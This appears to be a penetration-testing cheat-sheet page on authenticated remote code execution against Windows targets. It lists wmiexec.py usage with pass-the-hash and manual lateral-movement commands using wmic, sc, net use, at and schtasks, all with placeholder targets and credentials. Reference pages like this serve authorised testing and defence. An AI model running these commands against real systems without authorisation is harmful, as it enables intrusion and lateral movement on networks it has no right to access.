Authenticated RCE
Remote code execution on Windows target using legitimate credentials:
The content below should be moved to their dedicated section:
Automated Tools'
wmiexec.py
Executes a command or a semi-interactive shell using Windows Management Instrumentation (WMI).
wmiexec.py [DOMAIN/]<USERNAME>[:PASSWORD]@<HOST> [command]
- if you don’t specify any
[command], it will run a semi-interactive shell (C:\>) - if you don’t specify any
[password], it will prompt you to input the password interactively
Tip
Use -hashes LMHASH:NTHASH instead of specifying a password to authenticate using the pass-the-hash technique.
Manual Process
WMIC
wmic /node:[targetIP] /user:[admin_user] /password:[password] process call create [command]
If you leave off the /user and /password, it will pass through the existing user’s credentials (see SMB Sessions).
Tip
Replace [targetIP] by @[filename] to run [command] on every IP listed in the file.
schtasks and at
This process creates a service on the remote target in the very near future that executes a command.
net use \\[targetIP] /u:[admin_user]
2. Verify that the Schedule service is running and start it if not:
sc \\[targetIP] query schedule
sc \\[targetIP] start schedule
3. Check the current local time on the target machine:
net time \\[targetIP]
4. Schedule the job:
at \\[targetIP] [HH:MM] [A|P] [command]
schtasks /create /tn [taskname] /s [targetIP] /u [user] /p [password] /sc [frequency] /st [HH:MM:SS] /sd [startdate] /tr [command]
5. Verify the job status:
at \\[targetIP]
schtasks /query /s [targetIP]